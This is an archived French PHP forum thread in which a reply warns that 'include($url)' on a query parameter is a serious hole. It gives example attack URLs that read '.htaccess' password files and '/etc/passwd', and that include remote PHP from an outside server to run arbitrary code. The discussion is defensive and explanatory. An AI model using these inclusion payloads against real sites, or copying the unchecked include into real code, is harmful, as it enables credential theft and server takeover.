begin process at 2012 05 31 10:25:24
  Trouver un code source :
 
dans
 
Accueil > Forum > 

Archive PHP

 > 

Archives

 > 

AU SECOURS !!!

 > 

Securité avec INCLUDE


Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Securité avec INCLUDE

vendredi 20 juillet 2001 à 23:48:18 | Securité avec INCLUDE

bacto

bonjour,
je voudrais savoir si il y a un probleme de securité si je fais un site avec des liens vers des pages en php de la forme "mapage.php?url=pagedemandé.php" sachant que dans mapage.php il y aurai " include($url);"
est-ce qu'il y a alors un probleme de securité et si oui lequel ?
merci d'avance de vos reponses ;-)
samedi 21 juillet 2001 à 17:04:37 | Re : Securité avec INCLUDE

Romuald

Bah oui ça fait un GROS trou

Imagines par exemple que tu protèges un de test répertoires via un fichier .htaccess
Une personne mal intentionnée pourrait tout simplement appeller la page "mapage.php?url=repprotege/.htaccess" pour l'obtenir.
Après lecture de ce fichier il peut obtenir les mots de passe que tu as défini pour le répertoire.

Encore un autre méchant exemple, le type dispose d'un serveur Web et fait simplement "mapage.php?url=http://sonsite.dom/unscript.txt" avec du code PHP dans le fichier texte... à se moment là il peut executer n'importe quel code sur ton serveur et peut par exemple effacer tout ton site si ça lui chante.

Autre exemple (mais la j'ai un doute sur la possibilité, ça dépend des droits d'Apache et/ou des restrictions appliquées au PHP) sous Unix/Linux : "mapage.php?url=/etc/passwd"

-------------------------------
Réponse au message :
-------------------------------

bonjour,
je voudrais savoir si il y a un probleme de securité si je fais un site avec des liens vers des pages en php de la forme "mapage.php?url=pagedemandé.php" sachant que dans mapage.php il y aurai " include($url);"
est-ce qu'il y a alors un probleme de securité et si oui lequel ?
merci d'avance de vos reponses ;-)
samedi 21 juillet 2001 à 20:25:52 | Re : Securité avec INCLUDE

BaCTo

j'ai testé et en effet c tres dangeureux !!!
merci ;-)


-------------------------------
Réponse au message :
-------------------------------

Bah oui ça fait un GROS trou

Imagines par exemple que tu protèges un de test répertoires via un fichier .htaccess
Une personne mal intentionnée pourrait tout simplement appeller la page "mapage.php?url=repprotege/.htaccess" pour l'obtenir.
Après lecture de ce fichier il peut obtenir les mots de passe que tu as défini pour le répertoire.

Encore un autre méchant exemple, le type dispose d'un serveur Web et fait simplement "mapage.php?url=http://sonsite.dom/unscript.txt" avec du code PHP dans le fichier texte... à se moment là il peut executer n'importe quel code sur ton serveur et peut par exemple effacer tout ton site si ça lui chante.

Autre exemple (mais la j'ai un doute sur la possibilité, ça dépend des droits d'Apache et/ou des restrictions appliquées au PHP) sous Unix/Linux : "mapage.php?url=/etc/passwd"



Cette discussion est classée dans : php, probleme, include, mapage, securité


Répondre à ce message

Sujets en rapport avec ce message

Probleme d'include a partir d'un index.php?page=x [ par chatainsim ] Bonjour,  j'ai un probleme avec se script qui affiche en fonction de x dans index.php?page=x affiche la page x.php en include si 'page' est inexista Probleme d'include a partir d'un index.php?page=x [ par chatainsim ] Bonjour,  j'ai un probleme avec se script qui affiche en fonction de x dans index.php?page=x affiche la page x.php en include si 'page' est inexista Un probleme d'include / Script PHP [ par zedleouf ] petit probleme d'include [ par metal_death ] Bonjour j'ai un petit probleme j'ai creer un fichier "menu.php" a la racine de mon site et j'ai creer un dossier logout aujourd'hui mais j'ai un probl include et securité [ par craso ] bonjour,je veux savoir si ma facon d'incluredes fichiers est sans faille, vu que je débute, je ne peux pas le dire.Tous les liens sont du type "index. un include dans un include?? [ par val_lala ] Bonjour,J'ai un petit soucis de include (a moins que ce soit une faute bete de lien...)Voila je dois expliquer vite fait l'arborescense du site pour e Problèmes avec include [ par MJ92 ] Bonjour,Je vous fais part d'un soucis que j'ai et j'aimerai trouver une solution à ce problème. Voilà, j'ai voulu faire 2 include dans une page avec u [AIDE] Problème include. [ par ultra_nezz ] Bonjour,Pour se mettre dans le contexte, voici l'arborescence du site :        Voici maintenant le code de quelques pages :<br Problème de "variables indéfinie" comme qu'il dirait comme erreur [ par desperados27 ] Bonjour, j'ai lancé un serveur apache en local. La connexion au serveur est bonne. La connexion à la db mysl est bonne aussi. Alors maintenant j'ai un Include d'une page php avec une image (header?) [ par mono_neurone ] Bonjour a tous,Il y a peu de temps, je me suis attaqué a la réalisation d'un site en partie en php mais la je suis bloqué.Le prob en qq mots : index.p


Nos sponsors


Sondage...

Comparez les prix

CalendriCode

Mai 2012
LMMJVSD
 123456
78910111213
14151617181920
21222324252627
28293031   

Consulter la suite du CalendriCode

Photothèque

A découvrir



 
Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,312 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales